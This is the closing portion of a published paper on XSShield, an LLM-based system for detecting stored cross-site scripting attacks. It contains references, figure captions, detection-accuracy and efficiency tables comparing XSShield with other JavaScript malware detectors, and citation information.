  35. HynekPetrak. JavaScript Malware Collection. 2024. Available online: https://github.com/HynekPetrak/JavaScript-malware-collection (accessed on 10 March 2025).
  36. geeksonsecurity. Malicious JavaScript Dataset. 2017. Available online: https://github.com/geeksonsecurity/js-malicious-dataset (accessed on 10 March 2025).
  37. Romano, A.; Lehmann, D.; Pradel, M.; Wang, W. Wobfuscator: Obfuscating JavaScript Malware via Opportunistic Translation to WebAssembly. In Proceedings of the 2022 IEEE Symposium on Security and Privacy (SP), San Francisco, CA, USA, 22–26 May 2022; pp. 1574–1589. [Google Scholar] [CrossRef]
  38. Rieck, K.; Krueger, T.; Dewald, A. CUJO: Efficient detection and prevention of drive-by-download attacks. In Proceedings of the 26th Annual Computer Security Applications Conference, Austin, TX, USA, 6–10 December 2010; pp. 31–39. [Google Scholar]
  39. Aurore54F. lexical-jsdetector. 2024. Available online: https://github.com/Aurore54F/lexical-jsdetector (accessed on 10 March 2025).
  40. Curtsinger, C.; Livshits, B.; Zorn, B.; Seifert, C. ZOZZLE: Fast and Precise In-Browser JavaScript Malware Detection. In Proceedings of the USENIX Security Symposium, USENIX Security Symposium, San Francisco, CA, USA, 10–12 August 2011. [Google Scholar]
  41. Aurore54F. syntactic-jsdetector. 2024. Available online: https://github.com/Aurore54F/syntactic-jsdetector (accessed on 10 March 2025).
  42. Fass, A.; Backes, M.; Stock, B. JStap: A Static Pre-Filter for Malicious JavaScript Detection. In Proceedings of the 35th Annual Computer Security Applications Conference, San Juan, Puerto Rico, 9–13 December 2019; pp. 257–269. [Google Scholar]
  43. Aurore54F. JStap. 2024. Available online: https://github.com/Aurore54F/JStap (accessed on 10 March 2025).
  44. Dehghantanha, A.; Yazdinejad, A.; Parizi, R.M. Autonomous Cybersecurity: Evolving Challenges, Emerging Opportunities, and Future Research Trajectories. In Proceedings of the Workshop on Autonomous Cybersecurity (AutonomousCyber ‘24), New York, NY, USA, 14–18 October 2024; pp. 1–10. [Google Scholar] [CrossRef]
  45. Yazdinejad, A.; Dehghantanha, A.; Karimipour, H.; Srivastava, G.; Parizi, R.M. A Robust Privacy-Preserving Federated Learning Model Against Model Poisoning Attacks. IEEE Trans. Inf. Forensics Secur. 2024, 19, 6693–6708. [Google Scholar] [CrossRef]
  46. Jim, T.; Swamy, N.; Hicks, M. Defeating script injection attacks with browser-enforced embedded policies. In Proceedings of the 16th International Conference on World Wide Web (WWW ‘07), New York, NY, USA, 8–12 May 2007; pp. 601–610. [Google Scholar] [CrossRef]
  47. Gundy, M.V.; Chen, H. Noncespaces: Using Randomization to Enforce Information Flow Tracking and Thwart Cross-Site Scripting Attacks. In Proceedings of the Network and Distributed System Security Symposium, San Diego, CA, USA, 8–11 February 2009. [Google Scholar]
  48. Stock, B.; Lekies, S.; Mueller, T.; Spiegel, P.; Johns, M. Precise client-side protection against DOM-based cross-site scripting. In Proceedings of the 23rd USENIX Conference on Security Symposium (SEC’14), Anaheim, CA, USA, 9–11 August 2014; pp. 655–670. [Google Scholar]
  49. Samuel, M.; Saxena, P.; Song, D. Context-sensitive auto-sanitization in web templating languages using type qualifiers. In Proceedings of the 18th ACM Conference on Computer and Communications Security, New York, NY, USA, 17–21 October 2011; pp. 587–600. [Google Scholar] [CrossRef]
  50. Weinberger, J.; Saxena, P.; Akhawe, D.; Finifter, M.; Shin, R.; Song, D. A Systematic Analysis of XSS Sanitization in Web Application Frameworks. In Computer Security—ESORICS 2011; Atluri, V., Diaz, C., Eds.; Springer: Berlin/Heidelberg, Germany, 2011; pp. 150–171. [Google Scholar]
  51. Melicher, W.; Das, A.; Sharif, M.; Bauer, L.; Jia, L. Riding out DOMsday: Towards Detecting and Preventing DOM Cross-Site Scripting. In Proceedings of the Network and Distributed System Security Symposium, San Diego, CA, USA, 18–21 February 2018. [Google Scholar]
  52. West Mike, A.B.; Veditz, D. Content Security Policy Level 2. 2016. Available online: https://www.w3.org/TR/CSP2/ (accessed on 9 March 2025).
  53. Agten, P.; Acker, S.V.; Brondsema, Y.; Phung, P.H.; Desmet, L.; Piessens, F. JSand: Complete client-side sandboxing of third-party JavaScript without browser modifications. In Proceedings of the Asia-Pacific Computer Systems Architecture Conference, Matsue, Japan, 28–31 August 2012. [Google Scholar]
  54. Kolbitsch, C.; Livshits, B.; Zorn, B.; Seifert, C. Rozzle: De-cloaking Internet Malware. In Proceedings of the 2012 IEEE Symposium on Security and Privacy, San Francisco, CA, USA, 20–23 May 2012; pp. 443–457. [Google Scholar] [CrossRef]
  55. Fass, A.; Krawczyk, R.P.; Backes, M.; Stock, B. JaSt: Fully Syntactic Detection of Malicious (Obfuscated) JavaScript. In Detection of Intrusions and Malware, and Vulnerability Assessment; Giuffrida, C., Bardin, S., Blanc, G., Eds.; Springer: Cham, Switzerland, 2018; pp. 303–325. [Google Scholar]
  56. Wang, Y.; Cai, W.d.; Wei, P.c. A deep learning approach for detecting malicious JavaScript code. Sec. Commun. Netw. 2016, 9, 1520–1534. [Google Scholar] [CrossRef]
  57. Ndichu, S.; Kim, S.; Ozawa, S.; Misu, T.; Makishima, K. A machine learning approach to detection of JavaScript-based attacks using AST features and paragraph vectors. Appl. Soft Comput. 2019, 84, 105721. [Google Scholar] [CrossRef]
  58. Shin, T.; Razeghi, Y.; Logan, R.L., IV; Wallace, E.; Singh, S. AutoPrompt: Eliciting Knowledge from Language Models with Automatically Generated Prompts. arXiv 2020, arXiv:2010.15980. [Google Scholar]
  59. Gao, T.; Fisch, A.; Chen, D. Making Pre-trained Language Models Better Few-shot Learners. arXiv 2021, arXiv:2012.15723. [Google Scholar]
  60. Schick, T.; Schütze, H. Exploiting Cloze Questions for Few Shot Text Classification and Natural Language Inference. arXiv 2021, arXiv:2001.07676. [Google Scholar]
  61. Li, X.L.; Liang, P. Prefix-Tuning: Optimizing Continuous Prompts for Generation. arXiv 2021, arXiv:2101.00190. [Google Scholar]
  62. Brown, T.B.; Mann, B.; Ryder, N.; Subbiah, M.; Kaplan, J.; Dhariwal, P.; Neelakantan, A.; Shyam, P.; Sastry, G.; Askell, A.; et al. Language Models are Few-Shot Learners. arXiv 2020, arXiv:2005.14165. [Google Scholar]
  63. Wu, G.; Wu, W.; Liu, X.; Xu, K.; Wan, T.; Wang, W. Cheap-Fake Detection with LLM Using Prompt Engineering. In Proceedings of the 2023 IEEE International Conference on Multimedia and Expo Workshops (ICMEW), Brisbane, Australia, 10–14 July 2023; pp. 105–109. [Google Scholar] [CrossRef]
  64. Wang, E.; Chen, J.; Xie, W.; Wang, C.; Gao, Y.; Wang, Z.; Duan, H.; Liu, Y.; Wang, B. Where URLs Become Weapons: Automated Discovery of SSRF Vulnerabilities in Web Applications. In Proceedings of the 2024 IEEE Symposium on Security and Privacy (SP), San Francisco, CA, USA, 19–23 May 2024; pp. 239–257. [Google Scholar] [CrossRef]
Figure 1. Comparison of detection mechanisms between reflected XSS and stored XSS attacks. The left diagram illustrates how in reflected XSS attack scenarios, the differential analysis successfully detects malicious payload within the request–response traffic and issues a “ban” signal to prevent the attack from completing. The right diagram demonstrates how in stored XSS attack scenarios, the differential analysis becomes ineffective and issues a “pass” signal, allowing the attack to complete, since the attack payload only appears in the response but not in the request traffic. In the stored XSS case (right), when the victim user accesses the compromised page through normal request (3), the attack payload embedded in the server’s database is delivered in the response without any corresponding malicious content in the current request. This request–response mismatch prevents the detection system from establishing the causal relationship required for triggering the “ban” signal. Orange solid lines indicate traffic containing attack payloads, black solid lines represent normal traffic, and blue dashed lines denote control signals.
Figure 1. Comparison of detection mechanisms between reflected XSS and stored XSS attacks. The left diagram illustrates how in reflected XSS attack scenarios, the differential analysis successfully detects malicious payload within the request–response traffic and issues a “ban” signal to prevent the attack from completing. The right diagram demonstrates how in stored XSS attack scenarios, the differential analysis becomes ineffective and issues a “pass” signal, allowing the attack to complete, since the attack payload only appears in the response but not in the request traffic. In the stored XSS case (right), when the victim user accesses the compromised page through normal request (3), the attack payload embedded in the server’s database is delivered in the response without any corresponding malicious content in the current request. This request–response mismatch prevents the detection system from establishing the causal relationship required for triggering the “ban” signal. Orange solid lines indicate traffic containing attack payloads, black solid lines represent normal traffic, and blue dashed lines denote control signals.
Applsci 15 03348 g001
Figure 2. The architecture of XSShield for defending against stored XSS attacks. The system operates in two phases: (1) Training Phase (blue arrows): The Prompt Optimizer implements a three-stage optimization process as described in Section 3.1, including prompt expansion (identifies label-prediction mismatch samples through base model evaluation, analyzes error root causes via LLM-based reasoning on these adversarial cases, and generates enhanced prompts by combining diagnostic insights with original prompt templates) and prompt selection. (2) Operational Phase (yellow arrows): The Data Adaptor processes target JavaScript code through the pipeline detailed in Section 3.2, consisting of a PDG Generator, a PDG Partitioner, and a Code Representation Generator. The trained system achieves efficient detection by combining optimized prompts with the base model to classify incoming code representations as either benign or malicious, as described in Section 3.3’s LLM-based detector implementation.
Figure 2. The architecture of XSShield for defending against stored XSS attacks. The system operates in two phases: (1) Training Phase (blue arrows): The Prompt Optimizer implements a three-stage optimization process as described in Section 3.1, including prompt expansion (identifies label-prediction mismatch samples through base model evaluation, analyzes error root causes via LLM-based reasoning on these adversarial cases, and generates enhanced prompts by combining diagnostic insights with original prompt templates) and prompt selection. (2) Operational Phase (yellow arrows): The Data Adaptor processes target JavaScript code through the pipeline detailed in Section 3.2, consisting of a PDG Generator, a PDG Partitioner, and a Code Representation Generator. The trained system achieves efficient detection by combining optimized prompts with the base model to classify incoming code representations as either benign or malicious, as described in Section 3.3’s LLM-based detector implementation.
Applsci 15 03348 g002
Figure 3. Comparison of F1-scores between UCB and UCB-R selection algorithms across 12 rounds of evaluation on the validation set. The solid lines show the best-performing prompts per round, while the shaded areas represent the performance distribution of candidate prompts. Compared to the stable and gradual convergence of UCB (blue), UCB-R (orange) achieves superior peak performance after round 6, benefiting from its weighted random sampling strategy.
Figure 3. Comparison of F1-scores between UCB and UCB-R selection algorithms across 12 rounds of evaluation on the validation set. The solid lines show the best-performing prompts per round, while the shaded areas represent the performance distribution of candidate prompts. Compared to the stable and gradual convergence of UCB (blue), UCB-R (orange) achieves superior peak performance after round 6, benefiting from its weighted random sampling strategy.
Applsci 15 03348 g003
Table 1. Dataset composition for evaluation.
Table 1. Dataset composition for evaluation.
Development SetEvaluation Set
MaliciousHynekPetrak/JavaScript-malware-collectionBeEF Implement
geeksonsecurity/js-malicious-dataset
VirusTotal
BenignJS150k (excluding low-redundancy samples)305 low-redundancy JS files
Table 2. Performance comparison of XSShield and other detectors on evaluation sets.
Table 2. Performance comparison of XSShield and other detectors on evaluation sets.
Module CategoryXSShieldCujoZozzleJStap (Pdgngrams)JStap (Pdgvalues)JStap (Astngram)JStap (Astvalue)
BeEFInformation
Gathering
non-obf72.90% (78/107)0% (0/107)1.87% (2/107)0% (0/107)0% (0/107)0% (0/107)0% (0/107)
obf59.81% (64/107)0% (0/107)72.90% (78/107)9.35% (10/107)0% (0/107)9.35% (10/107)0% (0/107)
sum66.36% (142/214)0% (0/214)37.38% (80/214)4.67% (10/214)0% (0/214)4.67% (10/214)0% (0/214)
Exploitnon-obf92.92% (105/113)0% (0/113)0% (0/113)0% (0/113)0% (0/113)0% (0/113)0% (0/113)
obf69.03% (78/113)0% (0/113)97.35% (110/113)3.54% (4/113)0% (0/113)7.96% (9/113)0% (0/113)
sum80.97% (183/226)0% (0/226)48.67% (110/226)1.77% (4/226)0% (0/226)3.98% (9/226)0% (0/226)
Mobile and
Cross-Platform
non-obf81.25% (13/16)0% (0/16)0% (0/16)0% (0/16)0% (0/16)0% (0/16)0% (0/16)
obf56.25% (9/16)0% (0/16)75% (12/16)0% (0/16)0% (0/16)6.25% (1/16)0% (0/16)
sum68.75% (22/32)0% (0/32)37.5% (12/32)0% (0/32)0% (0/32)3.13% (1/32)0% (0/32)
Persistence and
Social Engineering
non-obf93.75% (30/32)0% (0/32)0% (0/32)0% (0/32)0% (0/32)0% (0/32)0% (0/32)
obf71.88% (23/32)0% (0/32)87.5% (28/32)3.13% (1/32)0% (0/32)9.38% (3/32)0% (0/32)
sum82.81% (53/64)0% (0/64)43.75% (28/64)1.56% (1/64)0% (0/64)4.69% (3/64)0% (0/64)
Auxiliary and
Support
non-obf82.14% (23/28)0% (0/28)0% (0/28)0% (0/28)0% (0/28)0% (0/28)0% (0/28)
obf64.29% (18/28)0% (0/28)78.57% (22/28)10.71% (3/28)3.57% (1/28)10.71% (3/28)3.57% (1/28)
sum73.21% (41/56)0% (0/56)39.29% (22/56)5.36% (3/56)1.79% (1/56)5.36% (3/56)1.79% (1/56)
Inter-Protocol
Communication
non-obf88.89% (8/9)0% (0/9)0% (0/9)0% (0/9)0% (0/9)0% (0/9)0% (0/9)
obf66.67% (6/9)0% (0/9)100% (9/9)0% (0/9)0% (0/9)0% (0/9)0% (0/9)
sum77.78% (14/18)0% (0/18)50% (9/18)0% (0/18)0% (0/18)0% (0/18)0% (0/18)
BeEF Summarynon-obf84.26% (257/305)0% (0/305)0.66% (2/305)0% (0/305)0% (0/305)0% (0/305)0% (0/305)
obf64.92% (198/305)0% (0/305)84.92% (259/305)5.90% (18/305)0.33% (1/305)8.52% (26/305)0.33% (1/305)
sum74.59% (455/610)0% (0/610)42.79% (261/610)2.95% (18/610)0.16% (1/610)4.26% (26/610)0.16% (1/610)
Benignnon-obf97.05% (296/305)100% (305/305)95.41% (291/305)100% (305/305)99.67% (304/305)100% (305/305)99.67% (304/305)
obf80.00% (244/305)100% (305/305)0% (0/305)77.38% (236/305)97.05% (296/305)82.62% (252/305)97.70% (298/305)
sum88.52% (540/610)100% (610/610)47.70% (291/610)88.69% (541/610)98.36% (600/610)91.31% (557/610)98.69% (602/610)
Summarynon-obf90.66% (553/610)50% (305/610)48.03% (293/610)50% (305/610)49.84% (304/610)50% (305/610)49.84% (304/610)
obf72.46% (442/610)50% (305/610)42.46% (259/610)41.64% (254/610)48.69% (297/610)45.57% (278/610)49.02% (299/610)
sum81.56% (995/1220)50% (610/1220)45.25% (552/1220)45.82% (559/1220)49.26% (601/1220)47.79% (583/1220)49.43% (603/1220)
MCCnon-obf0.81370−0.08110−0.03930−0.0393
obf0.59730−0.1741−0.1900−0.0380−0.1008−0.0261
sum0.70550−0.0165−0.0950−0.0387−0.0504−0.0327
F1non-obf0.899100.01250000
obf0.701800.59830.09150.00630.13540.0064
sum0.800500.43940.05170.00320.07540.0032
Table 3. Detection accuracy of other detectors on test sets.
Table 3. Detection accuracy of other detectors on test sets.
TechniqueCujoZozzleJStap (Pdgngrams)JStap (Pdgvalues)JStap (Astngram)JStap (Astvalue)
Benign0.99 (39,731 /39,731 + 18)39,153/39,153 + 14334,816/34,81634,760/34,760 + 238,676/38,676 + 138,687/38,687 + 2
Malicious0.85 (4455/4455 + 769)0.82 (3839/3839 + 833)4462/4462 + 964417/4417 + 1414585/4585 + 844541/4541 + 128
Table 4. Component-wise detection accuracy analysis of the XSShield on evaluation sets.
Table 4. Component-wise detection accuracy analysis of the XSShield on evaluation sets.
Non-AdaptorAdaptor
Correct/Total Accuracy Correct/Total Accuracy
Non-selectorMalicious132/30558.36%231/30573.11%
Benign224/305215/305
UCBMalicious163/30559.67%224/30577.87%
Benign201/305251/305
UCB-RMalicious208/30571.97%257/30586.07%
Benign231/305296/305
Table 5. Performance comparison of different evaluation models within XSShield.
Table 5. Performance comparison of different evaluation models within XSShield.
GPT-3.5-TurboGPT-4Gemini Pro
Malicious257/305272/30552/305
Benign296/305295/305170/305
F1-score0.90010.92660.2112
Table 6. The efficiency of detectors on evaluation sets.
Table 6. The efficiency of detectors on evaluation sets.
XSShieldJaStLexSynJStap (Pdgngrams)JStap (Pdgvalues)JStap (Astngram)JStap (Astvalue)
BeEFnon-obf5.6322 + Δs18.305548429489136s4.216928243637085s8.048108100891113s4.811763833000441s5.339117702s4.7260363990008045s4.901345518001108s
obf13.7899 + Δs22.624483585357666s3.9347400665283203s9.940247774124146s9.44910991800134s15.74884632s8.460276686000725s10.676183636998758s
Benignnon-obf34.9327 + Δs46.93710374832153s6.736656904220581s19.76883864402771s29.121426600999257s58.52059159s26.991471764999005s35.054263004998575s
obf195.6354 + Δa78.3315646648407s9.648104429244995s44.17033505439758s135.2840869929987s276.176368918s115.28895020699929s151.87477367199972s
avg per file0.205 + Δs0.136s0.020s0.067s0.146s0.292s0.127s0.191s
Disclaimer/Publisher’s Note: The statements, opinions and data contained in all publications are solely those of the individual author(s) and contributor(s) and not of MDPI and/or the editor(s). MDPI and/or the editor(s) disclaim responsibility for any injury to people or property resulting from any ideas, methods, instructions or products referred to in the content.

Share and Cite

MDPI and ACS Style

Zhou, Y.; Wang, E.; Yang, W.; Ge, W.; Yang, S.; Zhang, Y.; Qu, W.; Xie, W. XSShield: Defending Against Stored XSS Attacks Using LLM-Based Semantic Understanding. Appl. Sci. 2025, 15, 3348. https://doi.org/10.3390/app15063348

AMA Style

Zhou Y, Wang E, Yang W, Ge W, Yang S, Zhang Y, Qu W, Xie W. XSShield: Defending Against Stored XSS Attacks Using LLM-Based Semantic Understanding. Applied Sciences. 2025; 15(6):3348. https://doi.org/10.3390/app15063348

Chicago/Turabian Style

Zhou, Yuan, Enze Wang, Wantong Yang, Wenlin Ge, Siyi Yang, Yibo Zhang, Wei Qu, and Wei Xie. 2025. "XSShield: Defending Against Stored XSS Attacks Using LLM-Based Semantic Understanding" Applied Sciences 15, no. 6: 3348. https://doi.org/10.3390/app15063348

APA Style

Zhou, Y., Wang, E., Yang, W., Ge, W., Yang, S., Zhang, Y., Qu, W., & Xie, W. (2025). XSShield: Defending Against Stored XSS Attacks Using LLM-Based Semantic Understanding. Applied Sciences, 15(6), 3348. https://doi.org/10.3390/app15063348

Note that from the first issue of 2016, this journal uses article numbers instead of page numbers. See further details here.

Article Metrics

Back to TopTop